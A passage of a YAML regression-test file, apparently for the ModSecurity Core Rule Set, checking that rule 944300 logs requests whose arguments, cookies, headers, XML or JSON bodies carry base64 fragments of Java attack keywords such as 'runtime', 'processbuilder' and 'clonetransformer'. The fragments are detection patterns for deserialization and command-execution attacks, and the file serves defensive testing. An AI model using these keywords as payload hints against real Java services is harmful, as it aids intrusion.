"application/x-www-form-urlencoded" Cookie: test=BydW50aW1l method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-25 desc: "Cookie name includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: BydW50aW1l=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-26 desc: "Request header test includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: BydW50aW1l method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-27 desc: "XML attribute value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-28 desc: "XML element value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" 
port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-29 desc: "Nested XML element value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-30 desc: "Content-Type text/plain includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=BydW50aW1l" output: log_contains: "id \"944300\"" - test_title: 944300-31 desc: "Content-Type application/json arg value includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"BydW50aW1l\"}" output: log_contains: "id \"944300\"" - test_title: 944300-32 desc: "Content-Type application/json arg name includes keyword BydW50aW1l" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"BydW50aW1l\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-33 desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-34 desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI=test" output: log_contains: "id \"944300\"" - test_title: 944300-35 desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: 
"127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=cHJvY2Vzc2J1aWxkZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-36 desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: cHJvY2Vzc2J1aWxkZXI=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-37 desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: cHJvY2Vzc2J1aWxkZXI method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-38 desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-39 desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-40 desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-41 desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: 
"test=cHJvY2Vzc2J1aWxkZXI" output: log_contains: "id \"944300\"" - test_title: 944300-42 desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" output: log_contains: "id \"944300\"" - test_title: 944300-43 desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-44 desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-45 desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 
headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy=test" output: log_contains: "id \"944300\"" - test_title: 944300-46 desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=HByb2Nlc3NidWlsZGVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-47 desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: HByb2Nlc3NidWlsZGVy=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-48 desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: HByb2Nlc3NidWlsZGVy method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-49 desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-50 desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-51 desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-52 desc: 
"Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=HByb2Nlc3NidWlsZGVy" output: log_contains: "id \"944300\"" - test_title: 944300-53 desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" output: log_contains: "id \"944300\"" - test_title: 944300-54 desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-55 desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-56 desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg=test" output: log_contains: "id \"944300\"" - test_title: 944300-57 desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: test=Bwcm9jZXNzYnVpbGRlcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-58 desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" 
Content-Type: "application/x-www-form-urlencoded" Cookie: Bwcm9jZXNzYnVpbGRlcg=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-59 desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Bwcm9jZXNzYnVpbGRlcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-60 desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "element_value" output: log_contains: "id \"944300\"" - test_title: 944300-61 desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-62 desc: "Nested XML element value includes keyword 
Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/xml" method: "POST" version: "HTTP/1.0" data: "Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-63 desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "text/plain" method: "POST" version: "HTTP/1.0" data: "test=Bwcm9jZXNzYnVpbGRlcg" output: log_contains: "id \"944300\"" - test_title: 944300-64 desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" output: log_contains: "id \"944300\"" - test_title: 944300-65 desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/json" method: "POST" version: "HTTP/1.0" data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" output: log_contains: "id \"944300\"" - test_title: 944300-66 desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" output: log_contains: "id \"944300\"" - test_title: 944300-67 desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" method: "POST" version: "HTTP/1.0" data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" output: log_contains: "id \"944300\"" - test_title: 944300-68 desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: 
"application/x-www-form-urlencoded" Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-69 desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-70 desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" Accept-Encoding: "gzip,deflate" Accept-Language: "en-us,en;q=0.5" Content-Type: "application/x-www-form-urlencoded" test: Y2xvbmV0cmFuc2Zvcm1lcg method: "POST" version: "HTTP/1.0" data: "test=value" output: log_contains: "id \"944300\"" - test_title: 944300-71 desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 